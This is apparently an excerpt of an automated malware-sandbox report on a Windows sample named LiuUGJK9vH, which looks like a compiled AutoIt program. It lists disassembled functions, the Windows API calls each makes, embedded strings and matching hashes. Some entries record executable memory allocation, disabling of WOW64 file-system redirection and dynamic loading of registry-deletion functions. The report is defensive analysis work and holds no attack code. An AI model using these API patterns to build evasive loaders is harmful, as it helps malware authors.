                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 4aad69fb67f2ee0a84a7ca2cf82cc309062ff486820b0e2e94e29d8c7e2b4f72
                      • Instruction ID: 70d4a9b1a9711deeb65efc928d5e15c86d5dc5df1d90c4412d3e53a3998354fb
                      • Opcode Fuzzy Hash: 4aad69fb67f2ee0a84a7ca2cf82cc309062ff486820b0e2e94e29d8c7e2b4f72
                      • Instruction Fuzzy Hash: 89F0FF36D44204BBBE35EA64E9C5C16B3DABA047D57640C49EB49D7614CB30F8908F64
                      Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      • EndPath.GDI32(?), ref: 004013BF
                      • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                      • SelectObject.GDI32(?,00000000), ref: 004013EE
                      • DeleteObject.GDI32 ref: 00401401
                      • StrokePath.GDI32(?), ref: 0040141C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                      • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                      • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                      • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                      Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                      • __swprintf.LIBCMT ref: 00412ECD
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 1943609520-557222456
                      • Opcode ID: e0421d24bfd65513c9fcf2f49b072e57e4d72dd07e3c415dfad939c788340ccf
                      • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                      • Opcode Fuzzy Hash: e0421d24bfd65513c9fcf2f49b072e57e4d72dd07e3c415dfad939c788340ccf
                      • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                      Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                      Download Yara Rule
                      APIs
                      • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ContainedObject
                      • String ID: AutoIt3GUI$Container$%I
                      • API String ID: 3565006973-4251005282
                      • Opcode ID: 859201fce2af07cea7d3cab38f5f66955440e88cc47174b58300a9c10060e76e
                      • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                      • Opcode Fuzzy Hash: 859201fce2af07cea7d3cab38f5f66955440e88cc47174b58300a9c10060e76e
                      • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                      Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                      Download Yara Rule
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                        • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorHandling__87except__start
                      • String ID: pow
                      • API String ID: 2905807303-2276729525
                      • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                      • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                      • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                      • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                      Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: 3cA$_A
                      • API String ID: 4104443479-3480954128
                      • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                      • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                      • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                      • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                      Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: SysMonthCal32
                      • API String ID: 2326795674-1439706946
                      • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                      • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                      • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                      • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                      Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                      • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                      • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                      • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                      Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __calloc_crt
                      • String ID: K$@BL
                      • API String ID: 3494438863-2209178351
                      • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                      • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                      • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                      • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                      Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-3689287502
                      • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                      • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                      • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                      • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                      Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-1355242751
                      • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                      • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                      • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                      • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                      Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                      • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                      • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                      • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                      Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetModuleHandleExW$kernel32.dll
                      • API String ID: 2574300362-199464113
                      • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                      • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                      • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                      • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                      Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                      • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                      • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                      • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                      Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                      Download Yara Rule
                      APIs
                      • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                      • CharLowerBuffW.USER32(?,?), ref: 0047E101
                        • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                      • _memmove.LIBCMT ref: 0047E314
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharLower$AllocVirtual_memmove
                      • String ID:
                      • API String ID: 3659485706-0
                      • Opcode ID: ab9ce05aaf7ef72e75967f5c2c9fbff63471ebc438e10ba653b3ae7d5a8a630c
                      • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                      • Opcode Fuzzy Hash: ab9ce05aaf7ef72e75967f5c2c9fbff63471ebc438e10ba653b3ae7d5a8a630c
                      • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                      Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 004780C3
                      • CoUninitialize.OLE32 ref: 004780CE
                        • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                      • VariantInit.OLEAUT32(?), ref: 004780D9
                      • VariantClear.OLEAUT32(?), ref: 004783AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                      • String ID:
                      • API String ID: 780911581-0
                      • Opcode ID: 146b06d0ccda97621068481867dda55264d3b4f6e553a8e7a39d32f8a9431655
                      • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                      • Opcode Fuzzy Hash: 146b06d0ccda97621068481867dda55264d3b4f6e553a8e7a39d32f8a9431655
